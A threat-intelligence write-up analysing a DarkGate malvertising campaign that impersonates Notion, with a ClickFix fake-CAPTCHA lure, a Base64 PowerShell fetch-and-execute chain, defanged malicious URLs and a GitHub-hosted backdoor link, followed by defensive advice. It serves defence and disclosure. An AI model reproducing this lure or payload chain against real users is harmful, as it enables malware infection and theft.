# Threat Actor Using ClickFix and Phishing Attacks in the latest DarkGate Campaign

## Summary

Cyble Research and Intelligence Labs (CRIL) came across an article in which a security researcher discovered a ClickFix social engineering attack via malicious Google ads and a typical phishing page attack delivering Darkgate malware.

In a recent malvertising campaign impersonating the Notion brand, the two aforementioned techniques were observed in use. The threat actors were likely collecting metrics to determine which method resulted in the highest malware installation conversion rates.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739281788702/e4b3a340-4700-4ba3-aaa2-4ea77927d13f.png align="center")

## Campaign Details

### PowerShell code via “ClickFix”

Threat actors launched a Google ad impersonating the popular utility application Notion. On our first click, the ad redirected us to a site displaying a "Verify you are human" page, resembling Cloudflare Turnstile. However, this was not a legitimate Cloudflare service but rather a social engineering ploy.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739281883296/45d25144-5c2a-440a-8c64-3eeb99abca18.png align="center")

The HTML source code was obfuscated, appearing as gibberish interspersed with Russian comments. Upon further analysis, we identified it as Rot13, a letter substitution cipher. This was likely employed to conceal the malicious code from detection by security analysts and network defenses.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739281911745/9e609245-e634-4a5f-9719-6e9f80539c8a.png align="center")

After checking the box to verify our humanity, a new set of instructions titled “Verification steps” appeared, requiring specific key combinations. Pressing **Windows + R** opened the Run dialog, while **Ctrl + V** pasted a predefined code from the clipboard. Supposedly part of the verification process, this sequence instead tricked the victim into executing a malicious command upon pressing **Enter**.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739281937114/ab860d63-58e6-427d-9c7a-f238b7ffbeb8.png align="center")

The clipboard content is a command-line instruction designed to execute PowerShell.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739281960185/e21c7333-916c-4628-a69f-13aafde15dfe.png align="center")

The Base64-encoded string fetches the following code from

hxxps\[:\]//s2notion\[.\]com/in.php?action=1:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739281991186/03d4feb2-dc5a-4b00-9995-fbd852b78a38.png align="center")

This retrieves a binary from hxxps\[:\]//s2notion\[.\]com/in.php?action=2 and executes it. The file contains an AutoIt script that runs using the following command:

**"c:\\temp\\test\\Autoit3.exe" c:\\temp\\test\\script.a3x**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739282033902/50c8fafe-10cc-409c-942d-f650e1d64a4d.png align="center")

### Malicious ad and decoy site

Upon revisiting the malicious ad, the URL path was observed to include “/download/”.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739282072107/cf548c21-7ffe-4ed8-8e2b-cd7f28f5cbd2.png align="center")

This follows the more traditional malvertising approach for software downloads, where victims are deceived by a lookalike site before downloading an executable. The file was found hosted on GitHub under the user profile herawtisabela1992.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1739282096378/ad57e3f8-a29e-4a7d-a59f-5e5be007c666.png align="center")

This fake Notion installer was digitally signed (now revoked) by KDL CENTRAL LIMITED. Like the other binary mentioned in the first delivery technique, it extracts an AutoIt payload using the same DarkGate configuration.

Notably, the same GitHub user account was previously linked to the distribution of a backdoor called Warmcookie (also known as Badspace), which was hosted at:

raw\[.\]githubusercontent\[.\]com/herawtisabela1992/check/refs/heads/main/920836164\_x64.exe

## Recommendations

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:

● Ensure that robust security software is in place on all devices to detect and block malicious activities, including malware downloads and execution.

● Regularly train employees or users on how to spot phishing attempts, malicious ads, and suspicious pop-ups. Make them aware of common tactics such as fake "human verification" prompts and download scams.

● Always verify the source of software before downloading. Do not download software from untrusted sources and use official websites or trusted repositories only. If in doubt, check digital signatures and hashes.

● Leverage web filtering tools to block access to known malicious sites or suspicious URLs. This can help prevent users from visiting dangerous sites unknowingly.

● Where possible, enable MFA on accounts to add an extra layer of security. Even if an attacker successfully compromises a machine, MFA can prevent unauthorized access to sensitive systems

● Limit the types of files that can be executed on your network, especially scripts such as PowerShell, AutoIt, and others that are commonly used in these types of attacks.

● Implement continuous monitoring to detect unusual activity, such as suspicious file downloads or the execution of unknown scripts, and regularly audit network traffic for signs of malicious behavior.

## Conclusion

While the ClickFix social engineering attack wasn’t surprising, what made this campaign interesting was its alternation between ClickFix and the standard file download method.

The Threat Actor is likely tracking statistics and comparing which delivery method leads to the most successful installs. If we had to make a prediction, we would wager that ClickFix is currently outperforming. The file download method remains effective, particularly when the payload is digitally signed, but it may soon take a backseat to ClickFix.
